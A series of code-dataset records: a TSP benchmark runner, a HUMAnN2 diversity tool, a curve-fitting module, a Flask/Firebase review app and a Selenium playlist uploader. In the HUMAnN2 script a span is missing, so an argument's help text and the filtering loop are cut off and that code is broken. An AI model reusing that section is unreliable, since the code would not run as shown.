\"ts225\", \"tsp225\", \"pr226\", \"gil262\", \"pr264\", \"a280\", \"pr299\", \"lin318\", \"rd400\", \"fl417\", \"pr439\", \"pcb442\", \"d493\", \"u574\", \"rat575\", \"p654\", \"d657\", \"u724\", \"rat783\", \"dsj1000\", \"pr1002\", \"u1060\", \"vm1084\", \"pcb1173\", \"d1291\", \"rl1304\", \"rl1323\", \"nrw1379\", \"fl1400\", \"u1432\", \"fl1577\", \"d1655\", \"vm1748\", \"u1817\", \"rl1889\", \"d2103\", \"u2152\", \"u2319\", \"pr2392\", \"pcb3038\", \"fl3795\", \"fnl4461\", \"rl5915\", \"rl5934\", \"pla7397\", \"rl11849\", \"usa13509\", \"brd14051\", \"d15112\", \"d18512\", \"pla33810\", \"pla85900\", ]\n\n number_of_items_per_city = [1, ]\n\n types_of_items = [\"bounded-strongly-corr\", ]\n\n os.system(\"make\")\n\n for comb in itertools.product(tsp_bases, number_of_items_per_city, types_of_items):\n tsp_base, n_items_per_city, type_of_items = comb\n launcher(tsp_base, n_items_per_city, 
type_of_items)\n","sub_path":"tsp_component/run_all_tsp_problems.py","file_name":"run_all_tsp_problems.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"19562258","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function # PYTHON 2.7+ REQUIRED\nimport os\nimport sys\nimport argparse\nimport re\n\ntry:\n from humann2.tools import util\n from humann2.tools.humann2_table import Table\nexcept ImportError:\n sys.exit( \"CRITICAL ERROR: Unable to find the HUMAnN2 python package.\\n\" +\n \"Please check your install.\" ) \n\ntry:\n import numpy as np\n import scipy.spatial.distance as spd\nexcept ImportError:\n sys.exit( \"CRITICAL ERROR: This script requires the python scientific stack (numpy + scipy)\" )\n\ndescription = util.wrap( \"\"\"\nHUMAnN2 utility for calculating contributional diversity\n\nComputes ecological diversity statistics for individual \nfunctions in a stratified HUMAnN2 profile based on their \nper-species contributions. The analysis is restricted to \nfunctions that were 1) detected in a minimum fraction of samples (P),\nwith 2) a minimum abundance (A), and 3) a minimum fraction of function copies\n(E) attributed to species (i.e. not \"unclassified\").\n\nDiversity is calculated over samples where the function passed the\nabove criteria and the \"unclassified\" stratum is excluded. \nMean alpha (within-sample) diversity is calculated with the index. \nMean beta (between-sample) diversity is calculated with the index.\n\"\"\" )\n\n# ---------------------------------------------------------------\n# constants\n# ---------------------------------------------------------------\n\n# ---------------------------------------------------------------\n# command-line interface\n# ---------------------------------------------------------------\n\ndef get_args( ):\n parser = argparse.ArgumentParser(\n description=description, \n formatter_class=argparse.RawTextHelpFormatter,\n )\n util.attach_common_arguments( parser )\n parser.add_argument( \n \"-P\", \"--min-prevalence\",\n default=0.75,\n metavar=\"\",\n help=(\"A function must be detected + well-explained in this fraction of samples to be considered\\n\"\n \"[Default=0.75]\")\n )\n parser.add_argument( \n \"-A\", \"--min-abundance\",\n default=util.c_eps,\n metavar=\"\",\n help=(\"A function must meet this abundance to be considered 'detected' in a given sample\\n\"\n \"[Default=1e-20]\")\n )\n parser.add_argument( \n \"-E\", \"--min-explained\",\n default=0.75,\n type=float,\n metavar=\"\",\n help=(\"Exclude samples where = min_abund:\n if my_exp[i] / my_tot[i] >= min_explained:\n index.append( i )\n if len( index ) / float( n ) >= min_prevalence:\n allowed[f] = index\n # compute stats over passing samples (in index)\n fstats = {}\n for f, index in allowed.items( ):\n inner = fstats.setdefault( f, {} )\n # numpy list slice\n my_tot = total[f][index]\n my_exp = explained[f][index]\n # basic stats (all samples)\n inner[\"1: Prevalence (N)\"] = len( index )\n inner[\"2: Prevalence (frac)\"] = len( index ) / float( len( total[f] ) )\n inner[\"3: Mean abundance\"] = np.mean( my_tot )\n my_frac = my_exp / my_tot\n inner[\"4: Mean explained (frac)\"] = np.mean( my_frac )\n # stack of per-species contributions normalized to _their_ total\n stack = [row[index] / my_exp for row in stacks[f]]\n # convert to 2d array with samples as first axis\n samples = np.vstack( stack ).transpose( )\n # compute diversity (alpha=gini-simpson / 
beta=bray-curtis)\n inner[\"5: Alpha contrib. div.\"] = adiv_fast( samples )\n inner[\"6: Beta contrib. div.\"] = bdiv_fast( samples )\n # report\n print( \"Contributional diversity report:\", file=sys.stderr )\n tot = len( total )\n print( \" Features considered: {:,}\".format( tot ), file=sys.stderr )\n tot = len( fstats )\n frac = 100 * len( fstats ) / float( len( total ) )\n print( \" Required feature abundance >={} and >={}% of copies explained in >={}% of samples\".format(\n min_abund, 100 * min_explained, 100 * min_prevalence ), file=sys.stderr )\n print( \" Features deemed appropriate for analysis: {:,} ({:.1f}%)\".format( tot, frac ), file=sys.stderr )\n # nested dict of per-function stats\n return fstats\n \n# ---------------------------------------------------------------\n# main\n# ---------------------------------------------------------------\n\ndef main( ):\n args = get_args( )\n table = Table( args.input, last_metadata=args.last_metadata )\n # compute diversity stats\n fstats = contributional_diversity( \n table, \n min_prevalence=args.min_prevalence,\n min_abund=args.min_abundance, \n min_explained=args.min_explained,\n )\n # make output table\n headers = sorted( {v for k in fstats for v in fstats[k]} )\n data = {}\n for f in fstats:\n temp = []\n for h in headers:\n temp.append( fstats[f][h] )\n data[f] = np.array( temp )\n fstats = Table( data, headers=headers )\n fstats.anchor = \"# Feat \\ Stat\"\n fstats.write( args.output, unfloat=True )\n\nif __name__ == \"__main__\":\n main( )\n","sub_path":"humann2/tools/contributional_diversity.py","file_name":"contributional_diversity.py","file_ext":"py","file_size_in_byte":6983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"438756239","text":"from scipy.optimize import curve_fit\r\nfrom scipy import integrate, signal\r\nfrom scipy.special import wofz\r\nfrom scipy.interpolate import UnivariateSpline\r\nimport numpy as np\r\nimport matplotlib\r\n#matplotlib.use('Agg')\r\nimport matplotlib.pyplot as plt\r\nimport os, sys\r\n\r\n#import personal modules\r\nfrom peakShapes import voigtFn, gaussFn\r\n\r\ndef peakFitVar(data, LDatum, RDatum, peakShape, numCurves,\r\n savePath = None, filename = None):\r\n '''\r\n Peak fitting function. Fits with ?various? functions? \r\n Implements custom functions for allowing multiple peaks of same shape\r\n Attempts to plot at the end\r\n \r\n Input: Data array [x, y], complete data set\r\n Input: Peak bound indices\r\n Input: Peak shape: {Gaussian, Voigt}\r\n Input: numCurves = number of curves to fit\r\n \r\n Output: ndarray of optimized parameters. \r\n result[i] = opt. 
param of curve i\r\n FWHM calculated depending on curve type\r\n ''' \r\n\r\n # Convert left and right bounds to integers for indexing\r\n LDat = int(LDatum)\r\n RDat = int(RDatum)\r\n domain = np.arange(LDat, RDat)\r\n # print('LDat: {0}, RDat: {1}'.format(LDat, RDat))\r\n \r\n # Separate x and y data series\r\n xData = data[0]\r\n yData = data[1]\r\n \r\n # Locate position of max in domain \r\n maxInd = np.where(yData[domain] == np.max(yData[domain]))[0][0]\r\n # Shift according to LDat since data is complete \r\n loc = int(LDat + maxInd) # given all data\r\n # print('maxInd: {0}, loc: {1}'.format(maxInd, loc))\r\n \r\n #############################################################################\r\n ### Fit with specified peak shape.\r\n ### Populate guess paramters with residual\r\n #############################################################################\r\n \r\n # Initialize guess and bound arrays with correct shape for each function\r\n xRange = xData[RDat] - xData[LDat]\r\n xDomain = xData[0] - xData[-1]\r\n if peakShape == 'Voigt':\r\n func = voigtFn\r\n # x0 and I values to be replaced during loop\r\n guessTemp = [0, np.min(yData[domain]), 0,\r\n xRange / 10, xRange / 10 ]\r\n # x bounds to be replaced\r\n # [x0, y0, I, alpha, gamma]\r\n boundLowTemp = [xData[LDat], np.min(yData), 0., 0., 0.]\r\n boundUppTemp = [xData[RDat], np.inf, np.inf, xRange, xRange]\r\n\r\n boundLowerPart = [xData[LDat]-0.05*xRange, np.min(yData), 0, 0, 0]\r\n boundUpperPart = [xData[RDat]+0.05*xRange, np.inf, np.inf, xRange, xRange]\r\n elif peakShape == 'Gaussian':\r\n func = gaussFn \r\n # x0 and I values to be replaced during loop\r\n guessTemp = [0, np.min(yData[domain]), 0,\r\n xRange / 10]\r\n # x bounds to be replaced\r\n # [x0, y0, I, sigma]\r\n boundLowTemp = [xData[LDat]-0.05*xRange, np.min(yData), 0., 0.]\r\n boundUppTemp = [xData[RDat]+0.05*xRange, np.inf, np.inf, xRange]\r\n\r\n boundLowerPart = [xData[LDat], np.min(yData), 0, 0]\r\n boundUpperPart = [xData[RDat], np.inf, np.inf, xRange] \r\n\r\n\r\n # Initialize guess params and bounds for number of curves\r\n boundUpper = []\r\n boundLower = []\r\n guess = []\r\n \r\n # init fit array to compare residual \r\n fit = np.ones_like(yData[domain]) * np.min(yData[domain])\r\n \r\n # parameter array: [x0, y0, Intensity, alpha, gamma]\r\n # set up guesses\r\n curveCnt = 0\r\n resid = fit - yData[domain]\r\n errorCurr = np.mean(np.absolute(resid) / (yData[domain]+1))\r\n print('Peak at {0}, start iteration with error = {1}'.format(xData[loc], errorCurr))\r\n while curveCnt < numCurves and errorCurr > 0.001: \r\n # place peak at min residual\r\n xPosGuess = xData[domain][np.argmin(resid)]\r\n guessTemp[0] = xPosGuess\r\n guessTemp[2] = np.max(resid) - np.min(resid)\r\n \r\n # Deal with edge cases.. 
\r\n xPosLow = xPosGuess - 0.01*xRange\r\n if xPosLow < xData[0]: xPosLow = xData[0]\r\n xPosHigh = xPosGuess + 0.01*xRange\r\n if xPosHigh > xData[-1]: xPosHigh = xData[-1]\r\n \r\n # Update temp bounds to be close to position guess\r\n boundLowTemp[0] = xPosLow\r\n boundUppTemp[0] = xPosHigh\r\n\r\n boundTemp = tuple([boundLowTemp, boundUppTemp])\r\n try: # Fit according to residual\r\n poptTemp, pcovTemp = curve_fit(func, xData[domain], -resid, \r\n bounds=boundTemp, p0=guessTemp) \r\n #print('Fit to residual at {0}'.format(xPosGuess))\r\n except RuntimeError as e:\r\n print(e) \r\n poptTemp = guessTemp\r\n\r\n # Check to see if error decreased\r\n guessHold = guess + list(poptTemp)\r\n fit = func(xData[domain], *guessHold)\r\n resid = fit - yData[domain]\r\n errorNew = np.mean(np.absolute(resid) / (yData[domain]+1))\r\n if np.absolute(errorCurr - errorNew) < 0.0001:\r\n print('no change in error: {}'.format(errorNew))\r\n\r\n if curveCnt == 0: # if first peak does not change error\r\n # build guess real guess array, update fit\r\n guess = guessHold\r\n\r\n # concatenate lists for bounds for real fit\r\n boundLower += boundLowerPart \r\n boundUpper += boundUpperPart\r\n\r\n # Combine bounds into tuple for input\r\n bounds = tuple([boundLower, boundUpper])\r\n \r\n break #end iteration\r\n\r\n # build guess real guess array, update fit\r\n guess = guessHold\r\n\r\n # concatenate lists for bounds for real fit\r\n boundLower += boundLowerPart \r\n boundUpper += boundUpperPart\r\n\r\n # Combine bounds into tuple for input\r\n bounds = tuple([boundLower, boundUpper])\r\n \r\n # Calculate residual, increment, and print error information \r\n errorCurr = errorNew \r\n print('Peak at {0}, iteration {1}: error = {2}'.format(xData[loc], \r\n curveCnt, errorCurr))\r\n curveCnt+=1\r\n\r\n ####################################### Now fit whole peak with acq curves \r\n # Fit full curve, refining guesses\r\n try:\r\n # Curve fit function call using guess and bounds\r\n popt, pcov = curve_fit(func, xData[domain], yData[domain], \r\n bounds=bounds, p0=guess)\r\n except RuntimeError as e:\r\n print(e) \r\n popt = np.array(guess)\r\n \r\n\r\n # Calculate FWHM for each peak fit\r\n if peakShape == 'Voigt':\r\n FWHM = []\r\n c0 = 2.0056\r\n c1 = 1.0593\r\n for i in range(0, len(popt), 5): # grab fwhm for each peak\r\n fg = 2*popt[i+3]*np.sqrt(2*np.log(2))\r\n fl = 2*popt[i+4]\r\n phi = fl / fg\r\n FWHM.append(fg * (1-c0*c1 + np.sqrt(phi**2 + 2*c1*phi + (c0*c1)**2)))\r\n\r\n elif peakShape == 'Gaussian':\r\n FWHM = []\r\n for i in range(0, len(popt), 4): # grab fwhm for each peak\r\n FWHM.append(2*popt[i+3]*np.sqrt(2*np.log(2)))\r\n \r\n ###########################################################################\r\n ### Plotting and saving\r\n ###########################################################################\r\n if (savePath != None) and (filename != None):\r\n plt.figure(figsize=(8,8))\r\n \r\n # Organize final parameters into array\r\n finalParams = []\r\n for j in range(curveCnt): # Plot each individual curve\r\n L = 0 + j * len(popt) / curveCnt # Sep popt array\r\n R = (j+1) * len(popt) / curveCnt \r\n\r\n finalParams.append(popt[L:R])\r\n \r\n if (savePath != None) and (filename != None): # Plot setup\r\n plt.plot(xData[domain], func(xData[domain], *guess[L:R]), \r\n '--', alpha=0.5, label='guessed curve: ' + str(j))\r\n plt.plot(xData[domain], func(xData[domain], *popt[L:R]), '.', alpha=0.5, \r\n label='opt. 
curve {:.0f} FWHM = {:.3f}'.format(j, FWHM[j]))\r\n \r\n # Finish plotting \r\n if (savePath != None) and (filename != None):\r\n plt.plot(xData[domain], yData[domain], marker='s', color='k', label='data')\r\n plt.plot(xData[domain], func(xData[domain], *popt), \r\n color='r', label='combined data')\r\n #plt.plot(xData[loc], yData[loc], marker='o', label='max point') # Max position\r\n plt.legend()\r\n\r\n plt.savefig(savePath + str(filename) + 'peakAt_' + \r\n '{:.3f}'.format(xData[loc]) + '.png')\r\n\r\n #plt.text(np.max(xData[domain]), np.max(yData[domain]), r'FWHM = {0}'.format())\r\n \r\n plt.close()\r\n \r\n print('Plot generated for peak at: {:.3f}'.format(xData[loc]))\r\n return finalParams, FWHM\r\n\r\n\r\ndef calcFWHM(data, LDatum, RDatum):\r\n '''\r\n Calculate full width half maximum literally\r\n Return list of peak location, FWHM, intensity\r\n '''\r\n\r\n roots = []\r\n # Convert left and right bounds to integers for indexing\r\n LDat = int(LDatum)\r\n RDat = int(RDatum)\r\n domain = np.arange(LDat, RDat)\r\n \r\n # Separate x and y data series\r\n xData = data[0]\r\n yData = data[1]\r\n \r\n\r\n # Locate position of max in domain \r\n maxInd = np.where(yData[domain] == np.max(yData[domain]))[0][0]\r\n # Shift according to LDat since data is complete \r\n loc = int(LDat + maxInd) # given all data\r\n\r\n # If not enough points to fit spline, return 'N/A' \r\n if len(xData[domain]) < 5:\r\n return [xData[loc], 'N/A']\r\n\r\n #offset to 0 \r\n yDataOffset = yData - np.min(yData[domain]) \r\n yRange = np.max(yDataOffset[domain])\r\n spline = UnivariateSpline(xData[domain], yDataOffset[domain] - yRange/2)\r\n \r\n roots = spline.roots()\r\n \r\n if len(roots) >= 2: \r\n return [xData[loc], (np.max(roots) - np.min(roots[0])), np.max(yData[domain])]\r\n else: \r\n print('number of roots ({0}) < 2, at y={1}'.format(len(roots), yRange/2))\r\n print(roots)\r\n return [xData[loc], 'N/A', np.max(yData[domain])]\r\n","sub_path":"peakFitResidIter2.py","file_name":"peakFitResidIter2.py","file_ext":"py","file_size_in_byte":10038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"251824591","text":"from flask import Flask, render_template\nfrom firebase import firebase\nfrom firebase_admin import db\nfrom flask import request\n\n#\"{{ url_for('handle_data') }}\" //instead of typing out entire url\n\nFBConn = firebase.FirebaseApplication('https://howitrate-user-db-default-rtdb.firebaseio.com/', None)\n\napp = Flask(__name__)\n\ncategories = []\n\napp.static_folder = 'static'\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/', methods=['POST'])\ndef result():\n category = request.form.get('catName')\n\n data_to_upload = {\n 'Category' : category\n }\n\n result = FBConn.post('/MyTestData/', data_to_upload)\n\n return render_template(\"index.html\",result=category)\n\n'''@app.route('/addreview', methods=['POST'])\ndef addreview():\n review = request.form['Review']\n\n data_to_upload = {\n 'Review' : review\n }\n\n result = FBConn.post('/Reviews/', data_to_upload)'''\n\n@app.route('/categories', methods=['POST'])\ndef categories():\n\n #Getting data from database\n cats = FBConn.get('https://howitrate-user-db-default-rtdb.firebaseio.com/MyTestData', '')\n\n cat = []\n\n #looping over dictionary to get categories and put in list\n for i in cats:\n cat.append(cats.get(i).get('Category'))\n\n print(cat)\n\n cat = set(cat)\n cat = sorted(cat)\n\n return render_template(\"categories.html\", result=cat)\n\n 
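# Illustrative, hypothetical helper (not wired into the routes above), assuming
# the python-firebase client used here: get() returns None for an empty node,
# so the raw loops in this file can raise TypeError on a fresh database. A
# defensive variant of the category lookup, reusing the same FBConn handle:
def load_categories():
    cats = FBConn.get('/MyTestData', '') or {}  # fall back to an empty dict
    # unique, non-empty category names in a stable sorted order
    return sorted({entry.get('Category') for entry in cats.values() if entry.get('Category')})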
#return 'Click.'\n\n#where coffee reviews are\n@app.route('/coffeereviews', methods=['POST'])\ndef coffeereviews():\n\n    #Get and display reviews\n    reviews = FBConn.get('https://howitrate-user-db-default-rtdb.firebaseio.com/Reviews', '')\n\n    reviews_l = []\n\n    for i in reviews:\n        reviews_l.append(reviews.get(i).get('Review').get('review'))\n        #print(reviews_l)\n\n    return render_template(\"coffeereviews.html\", result=reviews_l)\n\n#where to go to post a review about coffee\n@app.route('/coffee', methods=['POST'])\ndef coffee():\n\n    #whenever the coffee button is pressed the form data is added to the database; still needs fixing\n\n    #Retrieve Review\n    rev = request.form\n\n    if (rev.get('form') != 'coffee'):\n        data_to_upload = {\n            'Review' : rev\n        }\n        FBConn.post('/Reviews/', data_to_upload)\n\n\n\n    return render_template(\"coffee.html\")\n\nif __name__ == '__main__':\n    app.run(debug=True)\n\n\n'''
'''\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#bottom\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"185341766","text":"\"\"\"\nPlaylist Formatter Tool\nAkseli Lukkarila\n2018\n\"\"\"\nimport csv\nimport os\nimport sys\nimport time\nimport platform\n\nfrom datetime import datetime, timedelta\nfrom timeit import default_timer as timer\n\nimport colorama\nimport openpyxl\nimport requests\nfrom titlecase import titlecase\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import Select, WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nfrom PyQt5.Qt import PYQT_VERSION_STR, QSizePolicy\nfrom PyQt5.QtCore import Qt, QT_VERSION_STR\nfrom PyQt5.QtGui import QIcon, QColor, QPalette, QKeySequence, QFont\nfrom PyQt5.QtWidgets import (QApplication, QWidget, QFileDialog, QStyle, QTreeWidgetItem, QHeaderView,\n QMainWindow, QMenuBar, QAbstractItemView, QGridLayout, QAction, QMessageBox,\n QDesktopWidget, QPushButton, QListWidget, QFontDialog, QLineEdit, QLabel, QTreeWidget)\n\n# ==================================================================================\n\nclass PlaylistFormatter:\n \"\"\"Reads a playlist textfile and creates correctly formatted csv or excel\"\"\"\n def __init__(self):\n self.playlistFile = None\n self.playlistDate = None\n self.playlistName = \"\"\n self.filepath = \"\"\n self.filename = \"\"\n self.filetype = \"\"\n self.playlist = []\n self.driver = None\n if platform.system().lower() == \"darwin\": # MacOS\n self.driverPath = \"/Users/Dropbox/CODE/webdriver/chromedriver\"\n else:\n self.driverPath = \"D:/Dropbox/CODE/webdriver/chromedriver.exe\"\n\n # ------------------------------------------------------------------------------\n\n def readPlaylist(self, filename):\n if not os.path.isfile(filename):\n raise RuntimeError(\"File does not exist.\")\n \n print(\"reading playlist {}\\n\".format(getColor(filename, colorama.Fore.YELLOW)))\n self.filepath, self.filename = os.path.split(filename)\n self.filename, self.filetype = os.path.splitext(self.filename)\n self.filetype = self.filetype.strip().lower()\n if self.filetype == \".csv\":\n self._readCSV(filename)\n\n elif self.filetype == \".txt\":\n self._readTXT(filename)\n\n elif self.filetype in (\".xlsx\", \".xlsm\", \".xltx\", \".xltm\"):\n self._readXLS(filename)\n\n else:\n raise RuntimeError(\"Unsupported filetype \\\"{}\\\".\".format(self.filetype))\n\n self.printPlaylist()\n\n # ------------------------------------------------------------------------------\n\n def _readCSV(self, filename):\n try:\n with open(filename) as csvFile:\n playlistData = csv.DictReader(csvFile)\n\n previousTime = timedelta()\n playlist = []\n playlistIndex = 0\n for index, rowData in enumerate(playlistData):\n if index == 0:\n self.playlistName = rowData[\"name\"]\n self.playlistDate = rowData[\"start time\"].split(\",\")[0]\n continue\n\n timeString = rowData[\"start time\"].replace(\".\", \":\").strip().split(\" \")[0]\n rowData[\"start time\"] = datetime.strptime(timeString, \"%H:%M:%S\")\n\n if index == 1:\n startTime = rowData[\"start time\"]\n\n title = rowData[\"name\"]\n if \" - \" in title:\n title = title.replace(\" - \", \" (\") + \")\"\n\n title = title.replace(\"(Clean)\", \"\").replace(\"(clean)\", \"\")\n title = 
title.replace(\"(Dirty)\", \"\").replace(\"(dirty)\", \"\")\n title = title.replace(\"(Original Mix)\", \"\").replace(\"(original Mix)\", \"\")\n title = title.replace(\"(Dirty-\", \"(\").replace(\"(dirty-\", \"(\")\n title = title.replace(\"(Clean-\", \"(\").replace(\"(clean-\", \"(\")\n title = title.replace(\" )\", \")\")\n title = title.replace(\"( \", \"(\")\n\n # split at all whitespace chars and recombine -> remove extra spaces and linebreaks...\n title = \" \".join(title.split())\n\n playTime = rowData[\"start time\"] - startTime\n songData = {\"artist\": titlecase(rowData[\"artist\"]), \n \"song\": titlecase(title),\n \"time\": playTime,\n \"playtime\": playTime - previousTime,\n \"starttime\": rowData[\"start time\"]}\n\n if songData[\"playtime\"] < timedelta(seconds=60):\n songData[\"playtime\"] = timedelta(seconds=60)\n\n # sum duplicate song playtimes\n if playlistIndex and playlist[playlistIndex-1][\"song\"] == songData[\"song\"] and playlist[playlistIndex-1][\"artist\"] == songData[\"artist\"]:\n playlist[playlistIndex-1][\"playtime\"] += songData[\"playtime\"]\n\n else:\n playlist.append(songData)\n playlistIndex += 1\n previousTime = playTime\n\n for i in range(1, len(playlist)):\n playlist[i-1][\"playtime\"] = playlist[i][\"playtime\"]\n\n self.playlist = playlist\n self.playlistFile = filename\n\n except Exception:\n errorType, errorValue, _ = sys.exc_info()\n raise RuntimeError(\"Error reading CSV:\\n{}: {}\".format(str(errorType), str(errorValue)))\n\n # ------------------------------------------------------------------------------\n\n def _readXLS(self, filename):\n # TODO\n pass\n\n # ------------------------------------------------------------------------------\n\n def _readTXT(self, filename):\n # TODO\n pass\n\n # ------------------------------------------------------------------------------\n\n def exportCSV(self, filename = None):\n if not self.playlist:\n raise RuntimeError(\"No playlist. Read a playlist first!\")\n\n outFilename = filename if filename else self.filename\n if not outFilename.endswith(\".csv\"):\n outFilename += \".csv\"\n\n outFile = os.path.join(self.filepath, outFilename)\n with open(outFile, \"w\", newline = \"\") as csvFile:\n csvWriter = csv.writer(csvFile, delimiter = \",\")\n csvWriter.writerow([\"Artist\", \"\", \"Song\", \"Time\", \"Playtime\", \"Start time\"])\n for row in self.playlist:\n csvWriter.writerow([row[\"artist\"],\n \"-\",\n row[\"song\"],\n str(row[\"time\"]).split(\", \")[-1],\n str(row[\"playtime\"]).split(\", \")[-1],\n row[\"starttime\"].strftime(\"%H:%M:%S\")])\n\n # ------------------------------------------------------------------------------\n\n def printPlaylist(self):\n if not self.playlist:\n raise RuntimeError(\"No playlist. 
Read a playlist first!\")\n\n widthArtist = max(len(row[\"artist\"]) for row in self.playlist)\n widthTitle = max(len(row[\"song\"]) for row in self.playlist)\n heading = \"{:<{widthArtist}s} {:<{widthTitle}s} {:9s} {:9s} {:9s}\".format(\n \"ARTIST\", \n \"SONG\", \n \"TIME\", \n \"PLAYTIME\",\n \"STARTTIME\", \n widthArtist = widthArtist + 2, \n widthTitle = widthTitle)\n printBold(heading)\n printColor(\"\".join([\"-\"] * len(heading)), colorama.Fore.LIGHTBLACK_EX)\n\n for row in self.playlist:\n print(\"{:<{widthArtist}s} - {:<{widthTitle}s} {} {} {}\".format(\n row[\"artist\"], \n row[\"song\"],\n colorama.Fore.YELLOW + str(row[\"time\"]).split(\", \")[-1],\n colorama.Fore.GREEN + str(row[\"playtime\"]).split(\", \")[-1], \n colorama.Fore.BLUE + row[\"starttime\"].strftime(\"%H:%M:%S\"), \n widthArtist = widthArtist,\n widthTitle = widthTitle) + \n colorama.Style.RESET_ALL) \n\n printColor(\"\".join([\"-\"] * len(heading)) + \"\\n\", colorama.Fore.LIGHTBLACK_EX)\n\n # ------------------------------------------------------------------------------\n\n def formatPlaylist(self):\n \"\"\"\n Return formatted playlist for printing.\n Returns (str): list of formatted song strings\n \"\"\"\n playlist = []\n if not self.playlist:\n raise RuntimeError(\"No playlist. Read a playlist first!\")\n\n widthArtist = max(len(row[\"artist\"]) for row in self.playlist)\n widthTitle = max(len(row[\"song\"]) for row in self.playlist)\n\n for row in self.playlist:\n playlist.append(\"{:<{widthArtist}s} - {:<{widthTitle}s} {}\".format(\n row[\"artist\"],\n row[\"song\"],\n str(row[\"time\"]).split(\", \")[-1],\n widthArtist = widthArtist,\n widthTitle = widthTitle))\n\n return playlist\n\n # ------------------------------------------------------------------------------\n\n def fillBasso(self, show, startIndex = 0):\n \"\"\"Fill radioshow playlist to Bassoradio database using Selenium\"\"\"\n printBold(\"Uploading playlist to dj.basso.fi...\", colorama.Fore.RED)\n startTime = timer()\n\n if len(self.playlist) <= startIndex:\n print(\"Index not valid.\")\n return\n\n self.openBassoDriver(show)\n\n print(\"\\nFilling playlist for show:\")\n printColor(show, colorama.Fore.CYAN)\n\n # input song data\n printColor(\"\\nAdding songs...\", colorama.Fore.MAGENTA)\n for index, row in enumerate(self.playlist[startIndex:]):\n inputIndex = 0\n print(\" {:d}: {:s} - {:s}\".format(index + 1, row[\"artist\"], row[\"song\"]))\n while True:\n # increase index so we don't send the first letter multiple times when trying again\n inputIndex += 1\n try:\n time.sleep(0.5)\n findTrack = WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.ID, \"find-track-textfield\")))\n findTrack.send_keys(row[\"artist\"][:inputIndex])\n\n WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.ID, \"new-track-entry-form\")))\n\n artist = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable((By.CSS_SELECTOR, \"[ng-model*='newTrack.artist']\")))\n time.sleep(0.5)\n artist.send_keys(row[\"artist\"][inputIndex:])\n\n song = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable((By.CSS_SELECTOR, \"[ng-model*='newTrack.title']\")))\n song.send_keys(row[\"song\"])\n\n mins = row[\"playtime\"].seconds // 60\n minutes = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable((By.CSS_SELECTOR, \"[ng-model*='newTrack.minutes']\")))\n minutes.send_keys(mins)\n\n secs = row[\"playtime\"].seconds % 60\n seconds = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable((By.CSS_SELECTOR, 
\"[ng-model*='newTrack.seconds']\")))\n seconds.send_keys(secs)\n\n save = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable((By.XPATH, \"//input[@type='button' and @value='Tallenna uusi biisi']\")))\n save.click()\n\n submitButton = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable((By.XPATH, \"//input[@type='submit' and @value='Lisää biisilistaan']\")))\n submitButton.click()\n\n except Exception as e:\n printColor(str(e), colorama.Fore.RED)\n continue\n else:\n break\n\n printColor(\"Done in {:.2f} seconds!\".format(timer() - startTime), colorama.Fore.GREEN)\n\n # ------------------------------------------------------------------------------\n\n def openBassoDriver(self, show):\n if not self.driver:\n # open webdriver if not already open\n self.driver = webdriver.Chrome(executable_path = self.driverPath)\n\n self.driver.get(\"Basso website here...\")\n\n # clear current show\n self.driver.find_element_by_id(\"broadcast-title-clear\").click()\n\n # select correct show\n select = Select(self.driver.find_element_by_css_selector(\"[ng-model*='play.broadcast']\"))\n select.select_by_visible_text(show)\n\n # ------------------------------------------------------------------------------\n\n def getShowString(self, date, showName):\n return \"{} 20:00-22:00 LIVE {}\".format(date, showName)\n\n\n# ==================================================================================\n\nclass PlaylistTool(QMainWindow):\n def __init__(self):\n super().__init__()\n\n self.formatter = PlaylistFormatter()\n if platform.system().lower() == \"darwin\": # MacOS\n self.defaultPath = os.path.expanduser(\"~/Dropbox\")\n else:\n self.defaultPath = 'D:/Dropbox'\n\n self.initUI()\n\n # ------------------------------------------------------------------------------\n\n def initUI(self):\n self.setWindowTitle(\"Esgrove's Playlist Tool\")\n self.setWindowIcon(self.style().standardIcon(QStyle.SP_MediaPlay))\n self.setAcceptDrops(True)\n\n # geometry\n self.setGeometry(0, 0, 1000, 800)\n self.setMinimumSize(500, 500)\n qtRectangle = self.frameGeometry()\n qtRectangle.moveCenter(QDesktopWidget().availableGeometry().center())\n self.move(qtRectangle.topLeft())\n\n # menubar\n self.menubar = self.menuBar()\n self.fileMenu = self.menubar.addMenu('&File')\n self.viewMenu = self.menubar.addMenu('&View')\n self.helpMenu = self.menubar.addMenu('&Help')\n self.statusbar = self.statusBar()\n\n # menu actions\n self.exitAct = QAction(self.style().standardIcon(QStyle.SP_MessageBoxCritical), '&Exit', self) \n self.exitAct.setShortcut(\"Escape\") # Ctrl+Q\n self.exitAct.setStatusTip('Exit application')\n self.exitAct.triggered.connect(self.closeEvent)\n self.fileMenu.addAction(self.exitAct)\n\n self.aboutAct = QAction(self.style().standardIcon(QStyle.SP_MessageBoxQuestion), '&About', self) \n self.aboutAct.setShortcut(\"Ctrl+I\")\n self.aboutAct.setStatusTip('About this application')\n self.aboutAct.triggered.connect(self.aboutEvent)\n self.helpMenu.addAction(self.aboutAct)\n\n self.fontAct = QAction(\"&Choose Font\", self)\n self.fontAct.triggered.connect(self.chooseFont)\n self.viewMenu.addAction(self.fontAct)\n\n # buttons\n self.openButton = QPushButton('Open playlist', self)\n self.openButton.setToolTip('Open playlist filedialog')\n 